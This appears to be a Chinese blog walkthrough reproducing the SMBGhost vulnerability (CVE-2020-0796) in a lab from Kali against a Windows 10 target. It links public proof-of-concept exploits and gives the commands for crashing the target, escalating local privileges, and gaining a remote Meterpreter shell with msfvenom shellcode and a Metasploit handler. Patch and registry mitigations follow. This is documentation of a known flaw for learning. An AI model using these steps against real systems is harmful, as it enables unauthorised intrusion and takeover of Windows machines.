cve-2020-0796_CVE20200796 | Windows SMBv3客户端/永痕之黑漏洞复现

最新推荐文章于 2024-04-25 09:51:05 发布
最新推荐文章于 2024-04-25 09:51:05 发布
阅读量453 收藏 1
点赞数
文章标签: cve-2020-0796

0x01 漏洞介绍

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,Microsoft Guidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

0x02 漏洞影响系统版本

  • 适用于32位系统的Windows 10版本1903

  • Windows 10 1903版(用于基于x64的系统)

  • Windows 10 1903版(用于基于ARM64的系统)

  • Windows Server 1903版(服务器核心安装)

  • 适用于32位系统的Windows 10版本1909

  • Windows 10版本1909(用于基于x64的系统)

  • Windows 10 1909版(用于基于ARM64的系统)

  • Windows Server版本1909(服务器核心安装)

0x03 漏洞环境

kali:192.168.44.128

靶机win10:192.168.44.138

永痕之黑 CVE-2020-0796 补丁编号:KB4551762

Tips:在我查看WIN10补丁时,没有看到这个补丁,当我使用检测工具检测时,发现靶机并没有这个漏洞。于是我卸载掉了5月份的一个补丁,和6月份的补丁,再次检测时,发现有这个漏洞了,感觉比较奇妙吧,记录一下。如果不想卸载补丁的话,可以重新装一台WIN10,下载链接:http://msdn.itellyou.cn/ 自己找想要的版本就好了,复现的话,最好停止win10自动更新。

0x04 漏洞复现

1.漏洞检测

漏洞检测工具有很多,个人比较推荐奇安信写的检测脚本

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

直接在cmd中拖CVE-2020-0796-Scaner.exe运行,输入IP,即可完成检测。

Tips:靶机需要关闭防火墙,不然扫描是扫不到的。

4947c17a12969e6e1b3b2e7925f6416b.png

2.漏洞利用

蓝屏POC:https://github.com/eerykitty/CVE-2020-0796-PoC

在Kali下我们执行如下命令:

git clone https://github.com/eerykitty/CVE-2020-0796-PoC.gitpython3 setup.py installpython3 CVE-2020-0796.py 192.168.44.138

Tips:这里需要python3的环境,如果你的kali是python2的话,最好切换python3,当然我并没有尝试过python2去利用,大家可以自己尝试一下可不可行。

a76790f48230ad562e6a9e6a57eaf8ef.png

在kali上执行脚本后,靶机win10就成这样了,然后自动重启。

ea9291a5f020adb3c7ae7ad8d5e591d5.png

3.提权利用

    a.本地提权。

    本地提权POC:https://github.com/danigargu/CVE-2020-0796/releases/download/v1.0/cve-2020-0796-local_static.zip

    建立了一个普通账户hack

e37d0c3f3fb657b9701732da7a7b5f92.png

下面我们把提取exe传上去,执行它。

22c05d7b91e3cd2cb1735eadf8a4508e.png

本地普通用户执行提权exe后弹出cmd窗口,成功获取system权限。

b.远程利用:

远程漏洞利用POC:https://github.com/chompie1337/SMBGhost_RCE_PoC

1.使用msfvenom生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b ‘\x00’ -i 1 -f python

07591415f686dbecec1b66d9bd506e2d.png

db88ebfa9cfdb36c342d2915fadf76cb.png

将生成的 shellcode 替换 POC 中 exploit.py 里的USER_PAYLOAD字段,注意要将buf替换为USER_PAYLOAD。

2.开启msf监听

use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset RHOST 192.168.44.138run

69c42ef4237f4f7099684e077371b022.png

然后run,开始监听4444端口。

3.运行POC,建立连接。

5d48e722ed4b6fc58fe732ec9d068a16.png

6baf4a4f3a11e7c8e37c3c919662b265.png

连接成功,成功拿到shell.~

总结:在复现的过程中,遇到了很多坑,如下

1.明明检测的时候是可以的,。。但是复现的时候它就自动打上了补丁,执行POC的时候会显示[-] physical read primitive failed!,然后就拿不到shell,导致我疑惑了很久,然后当我发现这个问题时,这个新打的补丁居然是无法卸载的,重新安装了一个win10 1903,才复现成功。

2.补丁号不一定是KB4551762,可能补丁合在一起变成了一个补丁吧。(猜测)

0x04 漏洞修复

1) 及时更新微软针对该漏洞所发布的的修复补丁(KB4551762)

ADV200005 | Microsoft Guidance for Disabling SMBv3 Compression

March 12, 2020—KB4551762 (OS Builds 18362.720 and 18363.720)

2)在注册表中建立一个名为 DisableCompression 的 DWORD (值为1) ,以禁用SMBv3的压缩功能:

powershell 中键入

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

    3)关闭445端口。

weixin_39661129
关注
永恒之CVE-2020-0796 微软SMBv3协议远程代码执行漏洞
曹振国的博客
07-26 2128
文章目录一、漏洞简介:二、影响版本:三、实验环境:四、漏洞复现1.下载CVE-2020-0796漏洞扫描工具,对网段进行扫描2.蓝屏复现3.远程执行复现 一、漏洞简介: 3月12日,微软更新安全通告针对Windows SMBv3客户端/服务器远程代码执行漏洞紧急发布了安全补丁,确定该漏洞编号为CVE-2020-0796。 Microsoft Server Message Block 3.1.1(SMBv3)协议在处理某些请求的方式中存在代码执行漏洞。攻击者可以精心构造数据包发送到SMB服务器,无需经过身份
【更新】CVE-2020-0796:微软紧急发布SMBv3协议“蠕虫级”漏洞补丁通告
爱国小白帽
03-13 5655
【更新】CVE-2020-0796:微软紧急发布SMBv3协议“蠕虫级”漏洞补丁通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 事件描述 2020年3月11日,360-CERT监测到有海外厂家发布安全规则通告,通告中描述了一处微软SMBv3协议的内存破坏漏洞,编号CVE-2020-0796,并表示该漏洞无需授权验证即可被远程利用,可能形成蠕虫级...
探索CVE-2020-0796Windows SMBv3漏洞的深入理解与利用
最新发布
gitblog_00037的博客
04-25 262
探索CVE-2020-0796Windows SMBv3漏洞的深入理解与利用 去发现同类优质开源项目:https://gitcode.com/ 该项目是一个开源的代码库,由开发者danigargu创建,旨在解析和研究微软Windows操作系统的严重安全漏洞——CVE-2020-0796(也被称作"BootHole")。该漏洞影响了SMBv3(Server Message Bl...
漏洞通告】微软SMBv3协议远程代码执行漏洞CVE-2020-0796)通告
更多内容查看博客描述。
03-16 1123
漏洞通告】微软SMBv3协议远程代码执行漏洞CVE-2020-0796)通告 【漏洞通告】微软SMBv3协议远程代码执行漏洞CVE-2020-0796)通告 通告编号:NS-2020-0017 TAG: SMBv3、远程代码执行、CVE-2020-0796 漏洞危害: 攻击者利用此漏洞,****可实现远程代码执行 版本: 1.0 1.漏洞概述 ...
【更新】本地提权工具公开|CVE-2020-0796:微软发布SMBv3协议“蠕虫级”漏洞补丁通告
爱国小白帽
03-31 1326
【更新】本地提权工具公开|CVE-2020-0796:微软发布SMBv3协议“蠕虫级”漏洞补丁通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 事件描述 2020年3月11日,360-CERT监测到有海外厂家发布安全规则通告,通告中描述了一处微软SMBv3协议的内存破坏漏洞,编号CVE-2020-0796,并表示该漏洞无需授权验证即可被远程利用,...
CVE-2020-0796:CVE-2020-0796-Windows SMBv3 LPE攻击#SMBGhost
03-19
CVE-2020-0796Windows SMBv3 LPE攻击#SMBGhost】是一个重要的安全漏洞,涉及到微软的Server Message Block (SMB) 协议的第3版。SMB是一个用于在局域网内共享文件、打印机和其他资源的协议。这个漏洞,也被称作...
NSE-scripts:NSE脚本可检测CVE-2020-1350 SIGRED和CVE-2020-0796 SMBGHOST,CVE-2021-21972
05-08
注意:该脚本只是安全地检查SMBv3上的CVE-2020-0796漏洞,并且不会尝试执行任何其他操作。 安装和运行 将.nse文件复制到nmap / scripts /文件夹并运行更新 cp cve-2020-0796.nse /usr/share/nmap/scripts/ nmap --...
CVE-2020-0796-PoC-master.zip
06-11
SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的协议头中对OriginalSize值可控,这样OriginalSize以一个极大的值,写入固定的缓冲区中,造成缓冲区溢出。精心构造后可执行恶意命令...
CVE-2020-0796,又是一场补丁攻坚战
03-16 1611
每年真正比较有影响力的漏洞编号,其实并不多,而这个CVE-2020-0796,就是我们在疫情之下全面返岗伊始,最值得去重视的一个。2020年3月12日晚...
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
CVE-2020-0796
m_de_g的博客
10-08 6777
CVE-2020-0796(永恒之) 一.对应出现的版本 永恒之的对象为采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。 原理为由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 首先下载 CVE-2020
永恒之 CVE-2020-0796
qq_46437017的博客
06-20 810
永恒之 CVE-2020-0796漏洞复现
CVE-2020-0796 “永恒之
三天不打上房揭瓦的博客
09-05 474
前言:前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。
CVE-2020-0796复现(基于kali实现)
m0_74988425的博客
03-06 1855
本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。然而,在这里使用的是`bind_tcp`,它不需要指定远程主机,因此在这种情况下,这个命令没有实际效果。CVE-2020-0796是指影响微软Windows 10和Windows Server 2019的一个漏洞,通常被称为"SMBGhost"或"CoronaBlue"。2. 网络分段: 将网络分为不同的区域,将不同的系统放置在不同的网络中。
cve-2020-0796_【CVE20200796漏洞复现
weixin_39644139的博客
11-30 678
一、漏洞简介该漏洞是服务器消息块3.1.1(SMBv3)协议中处理压缩消息时,对数据没有经过安全检查,直接使用会引发内存破坏,成功利用针对此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。利用针对服务器的漏洞,未经身份验证的攻击者可以将特制数据包发送到目标SMBv3服务器,若要利用针对客户端漏洞,未经身份验证的攻击者需要配置恶意SMBv3服务器,并诱使用户连接到该服务器。二、...
CVE-2020-0796 检测及利用工具
qq_45300786的博客
10-26 326
https://www.cnblogs.com/xiaozi/p/13062533.html
u852日期限制解决补丁_「更新」CVE-2020-0796微软发布SMBv3协议“蠕虫级”漏洞补丁通告...
weixin_28922087的博客
12-12 200
报告编号:B6-2020-031101报告来源:360-CERT报告作者:360-CERT更新日期:2020-03-110x00 事件描述2020年3月11日,360-CERT监测到有海外厂家发布安全规则通告,通告中描述了一处微软SMBv3协议的内存破坏漏洞,编号CVE-2020-0796,并表示该漏洞无需授权验证即可被远程利用,可能形成蠕虫级漏洞。3月12日,微软正式发布漏洞通告和相关补丁,36...
cve-2020-0796_CVE20200796 漏洞复现(rce)
weixin_39635657的博客
11-30 438
0X00漏洞简介Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议。微软公布了在Server Messag...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值